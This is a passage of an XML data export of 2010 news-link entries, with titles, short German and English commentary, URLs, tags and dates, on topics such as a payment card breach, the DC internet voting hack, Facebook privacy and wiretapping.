&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/10/08/aldi_payment_card_breach/</field><field type="FileField" name="page_screenshot">page_shots/2010/10/12/groceryterminalsslurpedpaymentcarddatathe.png</field><field type="SlugField" name="slug">groceryterminalsslurpedpaymentcarddatathe</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-12 11:23:52</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">aldi</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="10"></object></field></object><object pk="546" model="submitter.newsentry"><field type="CharField" name="title">Snuggly the Security Bear Speaks on Internet Wiretapping</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://annalist.noblogs.org/post/2010/10/12/snuggly-der-sicherheitsbar-und-die-internet-uberwachung/</field><field type="FileField" name="page_screenshot">page_shots/2010/10/12/snugglythesecuritybearspeaksoninternetwiret.png</field><field type="SlugField" name="slug">snugglythesecuritybearspeaksoninternetwiret</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">14</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">1</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-12 01:48:20</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">eff state surveillance</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="545" model="submitter.newsentry"><field type="CharField" name="title">heise online - Microsoft und Partner stellen Smartphones mit Windows Phone 7 vor</field><field type="TextField" name="excerpt">Here it is: Windows Phone 7:
Kein Multitasking, kein copy'n'paste, und er Browser basiert auf dem IE6
m(</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Here it is: Windows Phone 7:
Kein Multitasking, kein copy'n'paste, und er Browser basiert auf dem IE6
&lt;/p&gt;
&lt;p&gt;m(
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Microsoft-und-Partner-stellen-Smartphones-mit-Windows-Phone-7-vor-1105636.html</field><field type="FileField" name="page_screenshot">page_shots/2010/10/11/heiseonline-microsoftundpartnerstellensmart.png</field><field type="SlugField" name="slug">heiseonline-microsoftundpartnerstellensmart</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-11 23:23:23</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">microsoft phone7</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="544" model="submitter.newsentry"><field type="CharField" name="title">"Deleted" Facebook photos still not deleted: a followup</field><field type="TextField" name="excerpt">Wenn man keine Accounts löschen kann, dann auch keine Bilder. Facebook löscht keine Bilder.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Wenn man keine Accounts löschen kann, dann auch keine Bilder. Facebook löscht keine Bilder.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/web/news/2010/10/facebook-may-be-making-strides.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/10/11/quotdeletedquotfacebookphotosstillnotdele.png</field><field type="SlugField" name="slug">quotdeletedquotfacebookphotosstillnotdele</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-11 23:03:05</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">facebook</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="543" model="submitter.newsentry"><field type="CharField" name="title">Depubliziertes öffentlich rechtl. Sendungsmaterial</field><field type="TextField" name="excerpt">depub.org heißt jetzt depub.info
Die .org war plötzlich weg.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;depub.org heißt jetzt depub.info
Die .org war plötzlich weg.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://depub.info/</field><field type="FileField" name="page_screenshot">page_shots/2010/10/11/no_page_shot.png</field><field type="SlugField" name="slug">depubliziertes</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-11 22:59:22</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">gez</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="542" model="submitter.newsentry"><field type="CharField" name="title">India to build cyber attack proof operating system</field><field type="TextField" name="excerpt">Hackproove O/S from India:
'Though it will be a real-time system with Windows software, source code and architecture will be proprietary, giving us the exclusivity of owning a system unknown to foreign elements and protect our security system,' Saraswat said after unveiling a training facility at the Centre for Artificial Intelligence and Robotics (CAIR), a defence lab in this tech hub.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Hackproove O/S from India:
&lt;/p&gt;
&lt;p&gt;'Though it will be a real-time system with Windows software, source code and architecture will be proprietary, giving us the exclusivity of owning a system unknown to foreign elements and protect our security system,' Saraswat said after unveiling a training facility at the Centre for Artificial Intelligence and Robotics (CAIR), a defence lab in this tech hub.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.newdelhinews.net/story/695571</field><field type="FileField" name="page_screenshot">page_shots/2010/10/11/indiatobuildcyberattackproofoperatingsystem.png</field><field type="SlugField" name="slug">indiatobuildcyberattackproofoperatingsystem</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-11 11:31:37</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">hackproof, india, operating system</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="541" model="submitter.newsentry"><field type="CharField" name="title">Zoom for audio enables you to hear a single conversation in huge crowd</field><field type="TextField" name="excerpt">The AudioScope software then calculates the time it would take for sound emanating from that point to reach each microphone in the circular array, and digitally corrects each audio feed to synchronise them with that spot. "If we correct the audio arriving at three microphones then we have a signal that is three times as strong," says Kjølerbakken. Doing the same thing with 300 microphones can make a single conversation audible even in a stadium full of sports fans.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The AudioScope software then calculates the time it would take for sound emanating from that point to reach each microphone in the circular array, and digitally corrects each audio feed to synchronise them with that spot. "If we correct the audio arriving at three microphones then we have a signal that is three times as strong," says Kjølerbakken. Doing the same thing with 300 microphones can make a single conversation audible even in a stadium full of sports fans.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.newscientist.com/article/dn19541-audio-zoom-picks-out-lone-voice-in-the-crowd.html</field><field type="FileField" name="page_screenshot">page_shots/2010/10/08/zoomforaudioenablesyoutohearasingleconver.png</field><field type="SlugField" name="slug">zoomforaudioenablesyoutohearasingleconver</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-08 20:28:21</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">audio microphone privacy privatssphäre surveillance tracking</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="540" model="submitter.newsentry"><field type="CharField" name="title">heise online - Bundestag lässt Tablets zu</field><field type="TextField" name="excerpt">Finally, Tablets im Bundestag zulässig. Laptops immer noch verboten: zu sperrig, zu laut.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Finally, Tablets im Bundestag zulässig. Laptops immer noch verboten: zu sperrig, zu laut.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Bundestag-laesst-Tablets-zu-1103842.html</field><field type="FileField" name="page_screenshot">page_shots/2010/10/08/heiseonline-bundestaglassttabletszu.png</field><field type="SlugField" name="slug">heiseonline-bundestaglassttabletszu</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-08 10:54:05</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">bundestag tablet</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="539" model="submitter.newsentry"><field type="CharField" name="title">T-Mobile sneaks "rootkit" into G2 phones - reinstalls locked-down OS after jailbreaking</field><field type="TextField" name="excerpt">"I thought you might be interested in a new 'feature' of the latest Android phone. Officially released tomorrow October 6, some T-mobile stores began selling the HTC G2 yesterday. Within 24 hours, users have discovered that the phone has built-in hardware that restricts what software a device owner might wish to install. Specifically, one of the microchips embedded into the G2 prevents device owners from making permanent changes to the Android operating system, re-installing the original firmware."
... Sony rootkit anyone?</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;"I thought you might be interested in a new 'feature' of the latest Android phone. Officially released tomorrow October 6, some T-mobile stores began selling the HTC G2 yesterday. Within 24 hours, users have discovered that the phone has built-in hardware that restricts what software a device owner might wish to install. Specifically, one of the microchips embedded into the G2 prevents device owners from making permanent changes to the Android operating system, re-installing the original firmware."
&lt;/p&gt;
&lt;p&gt;... Sony rootkit anyone?
&lt;/p&gt;</field><field type="CharField" name="external_url">http://oti.newamerica.net/blogposts/2010/newest_google_android_cell_phone_contains_unexpected_feature_a_malicious_root_kit-380</field><field type="FileField" name="page_screenshot">page_shots/2010/10/06/t-mobilesneaksrootkitintog2phones-reinsta.png</field><field type="SlugField" name="slug">t-mobilesneaksrootkitintog2phones-reinsta</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-06 12:58:02</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">android, bürgerrechte, digital media, gadget, google, hardware, linux, open, smartphone, t-mobile</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="538" model="submitter.newsentry"><field type="CharField" name="title">Alex Halderman's totally epic hack of the DC internet voting system pilot program</field><field type="TextField" name="excerpt">"Within 36 hours of the system going live, our team had found and exploited a vulnerability that gave us almost total control of the server software, including the ability to change votes and reveal voters' secret ballots. In this post, I'll describe what we did, how we did it, and what it means for Internet voting. "
"Based on this experience and other results from the public tests, the D.C. Board of Elections and Ethics has announced that they will not proceed with a live deployment of electronic ballot return at this time, though they plan to continue to develop the system. Voters will still be able to download and print ballots to return by mail, which seems a lot less risky."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;"Within 36 hours of the system going live, our team had found and exploited a vulnerability that gave us almost total control of the server software, including the ability to change votes and reveal voters' secret ballots. In this post, I'll describe what we did, how we did it, and what it means for Internet voting. "
"Based on this experience and other results from the public tests, the D.C. Board of Elections and Ethics has announced that they will not proceed with a live deployment of electronic ballot return at this time, though they plan to continue to develop the system. Voters will still be able to download and print ballots to return by mail, which seems a lot less risky."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.freedom-to-tinker.com/blog/jhalderm/hacking-dc-internet-voting-pilot</field><field type="FileField" name="page_screenshot">page_shots/2010/10/06/alexhaldermanstotallyepichackofthedcinter.png</field><field type="SlugField" name="slug">alexhaldermanstotallyepichackofthedcinter</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-06 12:56:15</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">bürgerrechte, democracy, evoting, freiheit, hack, voting system, wahlcomputer</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object><object pk="9"></object><object pk="10"></object></field></object><object pk="537" model="submitter.newsentry"><field type="CharField" name="title">Sky Marshals to lose their cushy first-class seats?</field><field type="TextField" name="excerpt">Sky Marshals like to fly first class -- that's where the cockpit is, after all. Airlines hate it when Sky Marshals fly first: they have to give them the seat, even if it means bumping some loyal customer who's paid thousands for her ticket back to coach -- and the airlines aren't allowed to tell the bump-ee why she's not getting a warm dish of pecans and a linen napkin for her gin and tonic. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Sky Marshals like to fly first class -- that's where the cockpit is, after all. Airlines hate it when Sky Marshals fly first: they have to give them the seat, even if it means bumping some loyal customer who's paid thousands for her ticket back to coach -- and the airlines aren't allowed to tell the bump-ee why she's not getting a warm dish of pecans and a linen napkin for her gin and tonic.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://online.wsj.com/article_email/SB10001424052748703431604575521832473932878-lMyQjAxMTAwMDIwOTEyNDkyWj.html</field><field type="FileField" name="page_screenshot">page_shots/2010/10/05/skymarshalstolosetheircushyfirst-classseats_.png</field><field type="SlugField" name="slug">skymarshalstolosetheircushyfirst-classseats</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-05 17:46:19</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">flugzeug polizei security theater tsa</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="536" model="submitter.newsentry"><field type="CharField" name="title">Britisches Verteidigungsministerium warnt vor Facebook Places</field><field type="TextField" name="excerpt">Das britische Verteidigungsministerium sorgt sich um die Facebook-Mitglieder unter den militärischen und zivilen Mitarbeitern der britischen Streitkräfte, insbesondere die in Nordirland stationierten. Nachdem Facebook den Dienst Places vor wenigen Wochen auch in Großbritannien startete, warnt nun das Ministry of Defense (MoD) davor, dass Angreifer Militärangehörige genau lokalisieren könnten, denn Facebook zeigt mit Hilfe der Places-Funktion standardmäßig auch den Aufenthaltsort von Mitgliedern an.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Das britische Verteidigungsministerium sorgt sich um die Facebook-Mitglieder unter den militärischen und zivilen Mitarbeitern der britischen Streitkräfte, insbesondere die in Nordirland stationierten. Nachdem Facebook den Dienst Places vor wenigen Wochen auch in Großbritannien startete, warnt nun das Ministry of Defense (MoD) davor, dass Angreifer Militärangehörige genau lokalisieren könnten, denn Facebook zeigt mit Hilfe der Places-Funktion standardmäßig auch den Aufenthaltsort von Mitgliedern an.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Britisches-Verteidigungsministerium-warnt-vor-Facebook-Places-1100540.html</field><field type="FileField" name="page_screenshot">page_shots/2010/10/02/britischesverteidigungsministeriumwarntvorface.png</field><field type="SlugField" name="slug">britischesverteidigungsministeriumwarntvorface</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-02 15:49:29</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">facebook military privatssphäre surveillance tracking</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="10"></object></field></object><object pk="535" model="submitter.newsentry"><field type="CharField" name="title">Human society is not more violent today than in the past</field><field type="TextField" name="excerpt">Proof of things you already suspected: Human society is not more violent today than in the past. Quite the opposite, in fact. (At least, as measured by statistics based on Western European historical records.) Vaughn Bell of MindHacks turned up this fascinating story from 2003, in which sociologists and historians debate what, exactly, caused the precipitous drop off in the European murder rate that happened over the course of the 17th, 18th, and 19th centuries. Theories include "The Rise of Courtly Manners" and "The Establishment of the Modern State"</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Proof of things you already suspected: Human society is not more violent today than in the past. Quite the opposite, in fact. (At least, as measured by statistics based on Western European historical records.) Vaughn Bell of MindHacks turned up this fascinating story from 2003, in which sociologists and historians debate what, exactly, caused the precipitous drop off in the European murder rate that happened over the course of the 17th, 18th, and 19th centuries. Theories include "The Rise of Courtly Manners" and "The Establishment of the Modern State"
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.nytimes.com/2003/05/03/arts/did-knives-forks-cut-murders-counting-backward-historians-resurrect-crime.html</field><field type="FileField" name="page_screenshot">page_shots/2010/10/01/humansocietyisnotmoreviolenttodaythaninth.png</field><field type="SlugField" name="slug">humansocietyisnotmoreviolenttodaythaninth</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-10-01 10:50:27</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">polizeistaat terror</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="534" model="submitter.newsentry"><field type="CharField" name="title">Football star's cereal has phone sex number on box</field><field type="TextField" name="excerpt">Tara Sand and her family, including her 9-year-old daughter, called 1-800-HELP-FTC on speakerphone.
"You do have to admit it is kind of funny. When we dialed it for the second time, I sat there and thought 'are you kidding me?' Nobody has found this yet?" said Sand.
Ochocinco helped launch the cereal on September 7. He autographed boxes for fans at the Kroger Store in Newport, Ky.
As of Thursday morning, the boxes were pulled from the shelves at Kroger grocery stores until the marketing company for the cereal can be reached and the misprint can be evaluated. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Tara Sand and her family, including her 9-year-old daughter, called 1-800-HELP-FTC on speakerphone.
"You do have to admit it is kind of funny. When we dialed it for the second time, I sat there and thought 'are you kidding me?' Nobody has found this yet?" said Sand.
Ochocinco helped launch the cereal on September 7. He autographed boxes for fans at the Kroger Store in Newport, Ky.
As of Thursday morning, the boxes were pulled from the shelves at Kroger grocery stores until the marketing company for the cereal can be reached and the misprint can be evaluated.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.wcpo.com/dpp/news/region_central_cincinnati/sex-line-misprint-on-ochocinco%27s-cereal</field><field type="FileField" name="page_screenshot">page_shots/2010/09/30/footballstarscerealhasphonesexnumberonbox.png</field><field type="SlugField" name="slug">footballstarscerealhasphonesexnumberonbox</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-30 20:19:18</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">sex</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="533" model="submitter.newsentry"><field type="CharField" name="title">Slashdot Science Story | United Nations Names Ambassador To Aliens</field><field type="TextField" name="excerpt">Welcome the first UN-Ambassador for aliens.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Welcome the first UN-Ambassador for aliens.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://science.slashdot.org/story/10/09/27/1334255/United-Nations-Names-Ambassador-To-Aliens</field><field type="FileField" name="page_screenshot">page_shots/2010/09/29/slashdotsciencestoryunitednationsnamesamba.png</field><field type="SlugField" name="slug">slashdotsciencestoryunitednationsnamesamba</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-29 15:19:23</field><field to="show.pentashow" name="show" rel="ManyToOneRel">8</field><field type="CharField" name="tags_string">aliens</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="532" model="submitter.newsentry"><field type="CharField" name="title">Microsoft's DRM helps the hacker - Oops | TechEye</field><field type="TextField" name="excerpt">m( MS DRM-lib potentiell mit IntegerOverflow, BufferOverflow und DoS angreifbar. Wozu braucht man nochmal DRM?</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;m( MS DRM-lib potentiell mit IntegerOverflow, BufferOverflow und DoS angreifbar. Wozu braucht man nochmal DRM?
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.techeye.net/security/microsofts-drm-helps-the-hacker</field><field type="FileField" name="page_screenshot">page_shots/2010/09/28/microsoftsdrmhelpsthehacker-oopstechey.png</field><field type="SlugField" name="slug">microsoftsdrmhelpsthehacker-oopstechey</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-28 19:10:37</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">drm microsoft</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="531" model="submitter.newsentry"><field type="CharField" name="title">Canadian-Iranian blogger sentenced to 19 years in prison - The Globe and Mail</field><field type="TextField" name="excerpt">19 Jahre für erst Anti-Iranregime und dann pro-Iranregime Blogger. You can't do it right.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;19 Jahre für erst Anti-Iranregime und dann pro-Iranregime Blogger. You can't do it right.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theglobeandmail.com/news/world/africa-mideast/canadian-iranian-blogger-sentenced-to-19-years-in-prison/article1729730/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/28/canadian-iranianbloggersentencedto19yearsin.png</field><field type="SlugField" name="slug">canadian-iranianbloggersentencedto19yearsin</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-28 19:01:31</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">iran prision</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="530" model="submitter.newsentry"><field type="CharField" name="title">heise online - Segway-Eigentümer stirbt offenbar bei Segway-Unfall</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Segway-Eigentuemer-stirbt-offenbar-bei-Segway-Unfall-1096772.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/28/heiseonline-segway-eigentumerstirbtoffenbarb.png</field><field type="SlugField" name="slug">heiseonline-segway-eigentumerstirbtoffenbarb</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">4</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-28 17:59:23</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">darwinaward death segway</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="529" model="submitter.newsentry"><field type="CharField" name="title">
Microsoft kooperiert mit Wordpress - "Eindrucksvoll" - N24.de
</field><field type="TextField" name="excerpt">Da findet sich was zusammen gehört. s/Microsoft Live Blogging/Wordpress/g Immerhin hatte MS 30 Mio User.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Da findet sich was zusammen gehört. s/Microsoft Live Blogging/Wordpress/g Immerhin hatte MS 30 Mio User.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.n24.de/n/6351591</field><field type="FileField" name="page_screenshot">page_shots/2010/09/28/microsoftkooperiertmitwordpress-eindrucksvo.png</field><field type="SlugField" name="slug">microsoftkooperiertmitwordpress-eindrucksvo</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-28 16:09:51</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">microsoft wordpress</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="528" model="submitter.newsentry"><field type="CharField" name="title">OpenOffice.org community members launch the Document Foundation [LWN.net]</field><field type="TextField" name="excerpt">s/OpenOffice/LibreOffice/g
Oracle invited. So far backed by RedHat, Google, Novell and Cannonical.
[Handelsblatt](http://www.handelsblatt.com/technologie/it-internet/openoffice-org-wird-unabhaengig-freie-programmierer-fluechten-vor-oracle;2662779)</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;s/OpenOffice/LibreOffice/g
&lt;/p&gt;
&lt;p&gt;Oracle invited. So far backed by RedHat, Google, Novell and Cannonical.
&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.handelsblatt.com/technologie/it-internet/openoffice-org-wird-unabhaengig-freie-programmierer-fluechten-vor-oracle;2662779"&gt;Handelsblatt&lt;/a&gt;
&lt;/p&gt;</field><field type="CharField" name="external_url">http://lwn.net/Articles/407383/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/28/openofficeorgcommunitymemberslaunchthedocume_.png</field><field type="SlugField" name="slug">openofficeorgcommunitymemberslaunchthedocume</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-28 15:51:46</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">openoffice oracle</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="527" model="submitter.newsentry"><field type="CharField" name="title">U.S. Tries to Make It Easier to Wiretap the Internet - NYTimes.com</field><field type="TextField" name="excerpt">Cryptowars II starten gerade.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Cryptowars II starten gerade.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.nytimes.com/2010/09/27/us/27wiretap.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/27/ustriestomakeiteasiertowiretaptheintern.png</field><field type="SlugField" name="slug">ustriestomakeiteasiertowiretaptheintern</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-27 20:56:24</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">crypto</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="526" model="submitter.newsentry"><field type="CharField" name="title">Heatball :: Home</field><field type="TextField" name="excerpt">Da Glühlampen verboten sind gibt es jetzt den HeatBall (R). Hintergrund: In Energiesparlampen sind Quecksilber und andere Gifte, die wohl alle nun im Hausmüll enden. Der Einsatz von Energiesparlampen ist in vielen Fällen sinnvoll, aber nicht überall. Deshalb eine schöne Aktion, die für den Erhalt des Regenwaldes spendet.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Da Glühlampen verboten sind gibt es jetzt den HeatBall (R). Hintergrund: In Energiesparlampen sind Quecksilber und andere Gifte, die wohl alle nun im Hausmüll enden. Der Einsatz von Energiesparlampen ist in vielen Fällen sinnvoll, aber nicht überall. Deshalb eine schöne Aktion, die für den Erhalt des Regenwaldes spendet.
